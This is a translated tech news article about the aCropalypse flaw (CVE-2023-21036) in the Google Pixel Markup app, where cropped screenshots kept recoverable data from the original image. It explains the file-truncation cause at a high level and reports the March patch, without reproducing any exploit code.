aCropalypse, a bug in Pixel devices that allows you to restore screenshots


If exploited, these flaws can allow attackers to gain unauthorized access to sensitive information or generally cause problems

Information was released about a vulnerability (already cataloged under CVE-2023-21036) identified in the Markup app used in the smartphones Google Pixel to crop and edit screenshots, which allows partial restoration of cropped or edited information.

The engineers Simon Aarons and David Buchanan, who found the bug and produced a tool for recovery of proof Of Concept, respectively, they called it Cropalypse and noted that "this bug is bad" for people concerned about their privacy.

That means if someone gets a hold of your cropped image, they can try to get the part that's apparently missing back. If the image was redacted with scribbles over certain areas, those areas may be visible in the restored image. This is not good for privacy.

The problem manifests when editing PNG images in Markup and is caused by the fact that when a new modified image is written, the data is superimposed on the previous file without truncation, that is, the final file obtained after editing includes the tail of the source file, in which the data remains. old compressed data.

The problem It is classified as a vulnerability. since a user can post an edited image after removing sensitive data, but actually this data remains in the file, although it is not visible during normal viewing. To restore the remaining data, the web service was launched and an example Python script was published.

The vulnerability has been manifesting since the Google Pixel 3 series of smartphones launched in 2018 using firmware based on Android 10 and newer versions. The issue was fixed in the March Android firmware update for Pixel smartphones.

"The end result is that the image file is opened without the [truncated] flag, so that when the cropped image is written, the original image is not truncated," Buchanan said. "If the new image file is smaller, the end of the original is left behind."

The chunks of the file that were supposed to be truncated were found to be recoverable as images after doing some reverse engineering of the zlib compression library methodology, which Buchahan says he was able to do "after a few hours of playing around." ». The end result is a proof of concept that anyone with an affected Pixel device can test for themselves.

It is believed that the issue is due to an undocumented behavior change of the ParcelFileDescriptor.parseMode() method , in which, prior to the release of the Android 10 platform, the "w" (write) flag caused the file to be truncated when trying to write to an already existing file, but since the Android 10 release, the behavior changed and for truncation it was required to explicitly specify the "wt" (write, truncate) flag and when the "w" flag was specified, the queue was no longer removed after re- write.

In short, the “aCropalypse” flaw allowed someone to take a cropped PNG screenshot in Markup and undo at least some of the edits to the image. It's easy to imagine scenarios in which a bad actor could abuse that ability. For example, if a Pixel owner used Markup to redact an image that included sensitive information about himself, someone could exploit the flaw to reveal that information.

It is worth mentioning that Google has patched Cropalypse in its March Pixel security updates (just before details of the vulnerability were released):

All is well and good in the future: now you can crop, redact, and share without fear that your future images may be retrieved, but no unshared screenshots that are vulnerable to the exploit have already passed, uploaded to Discord, etc. . 

Finally if you are interested in knowing more about it about the vulnerability, you can consult the original publication at the following link.

The content of the article adheres to our principles of editorial ethics. To report an error click here.

Be the first to comment

Leave a Comment

Your email address will not be published. Required fields are marked with *



  1. Responsible for the data: AB Internet Networks 2008 SL
  2. Purpose of the data: Control SPAM, comment management.
  3. Legitimation: Your consent
  4. Communication of the data: The data will not be communicated to third parties except by legal obligation.
  5. Data storage: Database hosted by Occentus Networks (EU)
  6. Rights: At any time you can limit, recover and delete your information.